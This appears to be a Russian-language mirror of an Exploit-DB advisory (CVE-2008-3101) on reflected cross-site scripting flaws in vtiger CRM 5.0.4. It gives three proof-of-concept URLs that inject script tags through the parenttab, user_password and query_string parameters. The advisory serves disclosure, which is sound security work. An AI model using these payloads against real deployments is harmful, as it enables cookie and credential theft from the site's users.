- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32307
- Проверка EDB
-
- Пройдено
- Автор
- FABIAN FINGERLE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-3101
- Дата публикации
- 2008-09-01
Код:
source: https://www.securityfocus.com/bid/30951/info
vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vtiger CRM 5.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script>
- Источник
- www.exploit-db.com